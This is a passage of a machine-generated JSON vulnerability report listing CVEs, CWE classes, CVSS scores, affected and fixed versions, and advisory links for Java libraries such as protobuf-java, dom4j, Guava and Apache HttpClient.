GHSA-wrvw-hg22-4m67","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22569/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.  Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"],"known_not_affected":["org.dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"]}],"title":"CVE-2020-10683/pkg:maven/org.dom4j/dom4j@2.1.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8908"]}],"cve":"CVE-2020-8908","cwe":{"id":"173","name":"Improper Handling of Alternate Encoding"},"discovery_date":"2021-03-25T17:04:19","ids":[{"system_name":"CVE Record","text":"CVE-2020-8908"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Sensitive Information to an Unauthorized Actor","title":"Additional CWE: 200"},{"audience":"developers","category":"other","text":"Creation of Temporary File With Insecure Permissions","title":"Additional CWE: 378"},{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Guava"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Guava A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.   ## Related CVE(s) CVE-2020-8908, SNYK-JAVA-COMGOOGLEGUAVA-1015415"}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r037fed1d0ebde50c9caf8d99815db3093c344c3f651c5a49a09824ce@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322%40%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f%40%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf%40%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf@%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594%40%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"NetApp Advisory ntap-20220210-0003","url":"https://security.netapp.com/advisory/ntap-20220210-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLEGUAVA-1015415","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":3.3,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.3,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":3.3,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"]}],"title":"CVE-2020-8908/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-2976"]}],"cve":"CVE-2023-2976","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2023-06-14T18:30:38","ids":[{"system_name":"CVE Record","text":"CVE-2023-2976"},{"system_name":"Intel Advisory","text":"intel-sa-01006"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0008"}],"notes":[{"audience":"developers","category":"other","text":"Files or Directories Accessible to External Parties","title":"Additional CWE: 552"},{"category":"description","details":"Vulnerability Description","text":"Guava vulnerable to insecure use of temporary directory"},{"category":"details","details":"Vulnerability Details","text":"# Guava vulnerable to insecure use of temporary directory Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.  Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows."}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"NetApp Advisory ntap-20230818-0008","url":"https://security.netapp.com/advisory/ntap-20230818-0008"},{"summary":"Intel Advisory intel-sa-01006","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"]}],"title":"CVE-2023-2976/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13956"]}],"cve":"CVE-2020-13956","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2021-06-03T23:40:23","ids":[{"system_name":"CVE Record","text":"CVE-2020-13956"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Cross-site scripting in Apache HttpClient"},{"category":"details","details":"Vulnerability Details","text":"# Cross-site scripting in Apache HttpClient Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution."}],"product_status":{"known_affected":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"],"known_not_affected":["org.apache.httpcomponents/httpclient@4.5.13"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing 